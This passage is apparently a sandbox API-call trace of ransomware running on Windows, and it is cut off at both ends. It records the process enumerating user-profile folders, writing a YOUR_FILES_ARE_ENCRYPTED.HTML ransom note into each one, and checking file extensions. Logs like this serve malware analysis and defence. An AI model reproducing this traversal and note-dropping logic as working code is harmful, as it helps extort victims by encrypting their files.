returned="\\\\?\\C:\\Users\\Default\\Downloads\\*" [0110.768] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c10, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0110.768] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c10, cFileName="..", cAlternateFileName="")) returned 1 [0110.768] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c10, cFileName="..", cAlternateFileName="")) returned 0 [0110.768] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0110.768] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Downloads\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 60 [0110.768] GetProcessHeap () returned 0x600000 [0110.768] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.769] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\downloads\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0110.769] WriteFile (in: hFile=0x314, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0110.770] CloseHandle (hObject=0x314) returned 1 [0110.770] GetProcessHeap () returned 0x600000 [0110.770] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.770] GetProcessHeap () returned 0x600000 [0110.770] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.771] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0110.771] StrStrIW (lpFirst="Favorites", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.771] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites") returned 30 [0110.771] GetProcessHeap () returned 0x600000 [0110.771] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.771] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\Default\\Favorites" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites") returned="\\\\?\\C:\\Users\\Default\\Favorites" [0110.771] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Favorites", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\*") returned="\\\\?\\C:\\Users\\Default\\Favorites\\*" [0110.771] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c10, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0110.772] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c10, cFileName="..", cAlternateFileName="")) returned 1 [0110.772] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c10, cFileName="..", cAlternateFileName="")) returned 0 [0110.772] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0110.772] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 60 [0110.772] GetProcessHeap () returned 0x600000 [0110.772] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.772] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\favorites\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0110.772] WriteFile (in: hFile=0x314, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0110.773] CloseHandle (hObject=0x314) returned 1 [0110.774] GetProcessHeap () returned 0x600000 [0110.774] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.774] GetProcessHeap () returned 0x600000 [0110.774] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.774] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Links", cAlternateFileName="")) returned 1 [0110.774] StrStrIW (lpFirst="Links", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.774] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links") returned 26 [0110.774] GetProcessHeap () returned 0x600000 [0110.774] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.775] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\Default\\Links" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links") returned="\\\\?\\C:\\Users\\Default\\Links" [0110.775] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Links", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\*") returned="\\\\?\\C:\\Users\\Default\\Links\\*" [0110.775] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Links\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c10, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0110.775] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c10, cFileName="..", cAlternateFileName="")) returned 1 [0110.775] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c10, cFileName="..", cAlternateFileName="")) returned 0 [0110.775] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0110.776] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 56 [0110.776] GetProcessHeap () returned 0x600000 [0110.776] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.776] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\links\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0110.776] WriteFile (in: hFile=0x314, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0110.777] CloseHandle (hObject=0x314) returned 1 [0110.777] GetProcessHeap () returned 0x600000 [0110.777] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.777] GetProcessHeap () returned 0x600000 [0110.777] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.778] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0110.778] StrStrIW (lpFirst="Local Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.778] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Local Settings") returned 35 [0110.778] GetProcessHeap () returned 0x600000 [0110.778] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.779] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\Default\\Local Settings" | out: lpString1="\\\\?\\C:\\Users\\Default\\Local Settings") returned="\\\\?\\C:\\Users\\Default\\Local Settings" [0110.779] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Local Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Local Settings\\*") returned="\\\\?\\C:\\Users\\Default\\Local Settings\\*" [0110.779] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Local Settings\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c10, cFileName="..", cAlternateFileName="翿")) returned 0xffffffff [0110.779] GetProcessHeap () returned 0x600000 [0110.779] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.779] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Music", cAlternateFileName="")) returned 1 [0110.779] StrStrIW (lpFirst="Music", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.779] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Music") returned 26 [0110.779] GetProcessHeap () returned 0x600000 [0110.779] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.779] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\Default\\Music" | out: lpString1="\\\\?\\C:\\Users\\Default\\Music") returned="\\\\?\\C:\\Users\\Default\\Music" [0110.779] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Music", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Music\\*") returned="\\\\?\\C:\\Users\\Default\\Music\\*" [0110.779] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Music\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c10, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0110.779] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c10, cFileName="..", cAlternateFileName="")) returned 1 [0110.779] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c10, cFileName="..", cAlternateFileName="")) returned 0 [0110.779] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0110.780] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Music\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 56 [0110.780] GetProcessHeap () returned 0x600000 [0110.780] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.780] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Music\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\music\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0110.780] WriteFile (in: hFile=0x314, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0110.781] CloseHandle (hObject=0x314) returned 1 [0110.782] GetProcessHeap () returned 0x600000 [0110.782] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.782] GetProcessHeap () returned 0x600000 [0110.782] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.782] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d527734, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d527734, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d527734, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0110.782] StrStrIW (lpFirst="My Documents", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.782] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\My Documents") returned 33 [0110.782] GetProcessHeap () returned 0x600000 [0110.782] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.783] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\Default\\My Documents" | out: lpString1="\\\\?\\C:\\Users\\Default\\My Documents") returned="\\\\?\\C:\\Users\\Default\\My Documents" [0110.783] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\My Documents", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\My Documents\\*") returned="\\\\?\\C:\\Users\\Default\\My Documents\\*" [0110.783] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\My Documents\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c10, cFileName="..", cAlternateFileName="翿")) returned 0xffffffff [0110.783] GetProcessHeap () returned 0x600000 [0110.783] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.784] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="NetHood", cAlternateFileName="")) returned 1 [0110.784] StrStrIW (lpFirst="NetHood", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.784] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\NetHood") returned 28 [0110.784] GetProcessHeap () returned 0x600000 [0110.784] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.784] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\Default\\NetHood" | out: lpString1="\\\\?\\C:\\Users\\Default\\NetHood") returned="\\\\?\\C:\\Users\\Default\\NetHood" [0110.785] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\NetHood", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\NetHood\\*") returned="\\\\?\\C:\\Users\\Default\\NetHood\\*" [0110.785] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\NetHood\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c10, cFileName="..", cAlternateFileName="翿")) returned 0xffffffff [0110.785] GetProcessHeap () returned 0x600000 [0110.785] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.785] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x31bfa5a5, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xea64ab63, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xea64ab63, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0110.785] StrStrIW (lpFirst="NTUSER.DAT", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.785] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT") returned 31 [0110.785] PathFindExtensionW (pszPath="NTUSER.DAT") returned=".DAT" [0110.785] lstrlenW (lpString=".DAT") returned 4 [0110.785] PathFindExtensionW (pszPath="NTUSER.DAT") returned=".DAT" [0110.785] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x31cb9166, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x31cb9166, ftLastAccessTime.dwHighDateTime=0x1d112dc, ftLastWriteTime.dwLowDateTime=0x31cb9166, ftLastWriteTime.dwHighDateTime=0x1d112dc, nFileSizeHigh=0x0, nFileSizeLow=0x9000, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="NTUSER.DAT.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0110.785] StrStrIW (lpFirst="NTUSER.DAT.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.785] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1") returned 36 [0110.785] PathFindExtensionW (pszPath="NTUSER.DAT.LOG1") returned=".LOG1" [0110.785] lstrlenW (lpString=".LOG1") returned 5 [0110.785] PathFindExtensionW (pszPath="NTUSER.DAT.LOG1") returned=".LOG1" [0110.785] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x31cb9166, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x31cb9166, ftLastAccessTime.dwHighDateTime=0x1d112dc, ftLastWriteTime.dwLowDateTime=0x31cb9166, ftLastWriteTime.dwHighDateTime=0x1d112dc, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="NTUSER.DAT.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0110.785] StrStrIW (lpFirst="NTUSER.DAT.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.785] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2") returned 36 [0110.785] PathFindExtensionW (pszPath="NTUSER.DAT.LOG2") returned=".LOG2" [0110.785] lstrlenW (lpString=".LOG2") returned 5 [0110.785] PathFindExtensionW (pszPath="NTUSER.DAT.LOG2") returned=".LOG2" [0110.785] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8d5f4e96, ftCreationTime.dwHighDateTime=0x1d700aa, 